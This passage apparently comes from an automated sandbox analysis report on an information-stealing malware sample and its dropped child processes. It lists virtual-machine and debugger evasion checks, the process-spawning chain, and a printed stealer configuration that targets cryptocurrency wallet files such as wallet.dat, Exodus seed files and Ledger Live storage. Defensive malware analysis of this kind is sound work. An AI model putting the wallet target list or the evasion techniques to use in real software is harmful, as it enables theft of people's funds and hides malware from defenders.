                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Standard without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: vmci.syshbin
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Standard without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
                        Source: Amcache.hve.6.drBinary or memory string: VMware20,1hbin@
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
                        Source: cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: xVBoxService.exe
                        Source: Amcache.hve.6.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
                        Source: Amcache.hve.6.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
                        Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: *Windows 11 Server Standard without Hyper-V
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: ,Windows 2016 Server Standard without Hyper-V
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Standard without Hyper-V (core)
                        Source: Amcache.hve.6.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
                        Source: cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: VBoxService.exe
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 8.1 Server Standard without Hyper-V
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.0000000001709000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                        Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: *Windows 10 Server Standard without Hyper-V
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
                        Source: AAFBAKEC.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
                        Source: AAFBAKEC.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
                        Source: cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: VMWare
                        Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: AAFBAKEC.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                        Source: AAFBAKEC.0.drBinary or memory string: outlook.office.comVMware20,11696487552s
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
                        Source: AAFBAKEC.0.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                        Source: wqmnYoVbHr.exe, wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmp, cb41bc9329.exe, 0000000E.00000001.2771465442.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, cb41bc9329.exe, 0000000E.00000002.2783356868.000000000095C000.00000040.00000001.01000000.0000000E.sdmpBinary or memory string: #Windows 11 Microsoft Hyper-V Server
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeSystem information queried: ModuleInformationJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeThread information set: HideFromDebuggerJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeCode function: 8_2_04AD06D7 Start: 04AD07B8 End: 04AD06E68_2_04AD06D7
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeCode function: 8_2_04AD075F Start: 04AD07B8 End: 04AD07C28_2_04AD075F
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeOpen window title or class name: regmonclass
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeOpen window title or class name: gbdyllo
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeOpen window title or class name: procmon_window_class
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeOpen window title or class name: ollydbg
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeOpen window title or class name: filemonclass
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeFile opened: NTICE
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeFile opened: SICE
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeFile opened: SIWVID
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeCode function: 8_2_04AD0BAF rdtsc 8_2_04AD0BAF
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C925FF0 IsDebuggerPresent,??0PrintfTarget@mozilla@@IAE@XZ,?vprint@PrintfTarget@mozilla@@QAE_NPBDPAD@Z,OutputDebugStringA,__acrt_iob_func,_fileno,_dup,_fdopen,__stdio_common_vfprintf,fclose,0_2_6C925FF0
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8C3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime,0_2_6C8C3480
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8FB66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_6C8FB66C
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8FB1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_6C8FB1F7
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe"Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\EHCBAAAFHJ.exe"Jump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe "C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\AFHDAKJKFC.exeProcess created: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe "C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe" Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeProcess created: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe "C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8FB341 cpuid 0_2_6C8FB341
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformationJump to behavior
                        Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeQueries volume information: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\9217037dc9\explortu.exeQueries volume information: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exe VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Users\user\Desktop\wqmnYoVbHr.exeCode function: 0_2_6C8C35A0 ?Startup@TimeStamp@mozilla@@SAXXZ,InitializeCriticalSectionAndSpinCount,getenv,QueryPerformanceFrequency,_strnicmp,GetSystemTimeAdjustment,__aulldiv,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,QueryPerformanceCounter,EnterCriticalSection,LeaveCriticalSection,__aulldiv,strcmp,strcmp,_strnicmp,0_2_6C8C35A0
                        Source: C:\Users\user\AppData\Local\Temp\1000022001\cb41bc9329.exeCode function: 14_2_7EA91B40 GetUserNameA,14_2_7EA91B40
                        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                        Source: Amcache.hve.6.drBinary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        barindex
                        Source: Yara matchFile source: 10.2.explortu.exe.450000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 8.2.AFHDAKJKFC.exe.5c0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000008.00000002.2394465474.00000000005C1000.00000040.00000001.01000000.00000009.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000003.2372578172.0000000004C30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.2412717036.0000000000451000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000D.00000003.2714164335.00000000051A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000008.00000003.2305772420.00000000048C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0.2.wqmnYoVbHr.exe.580000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.cb41bc9329.exe.720000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000E.00000002.2783356868.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2290413954.0000000000581000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000E.00000002.2784688006.0000000001BB4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2291406262.00000000016CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: wqmnYoVbHr.exe PID: 2308, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: cb41bc9329.exe PID: 6184, type: MEMORYSTR
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 0.2.wqmnYoVbHr.exe.580000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 14.2.cb41bc9329.exe.720000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000E.00000002.2783356868.0000000000721000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000000.00000002.2290413954.0000000000581000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: wqmnYoVbHr.exe PID: 2308, type: MEMORYSTR
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                        Source: wqmnYoVbHr.exe, 00000000.00000002.2291406262.00000000016C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
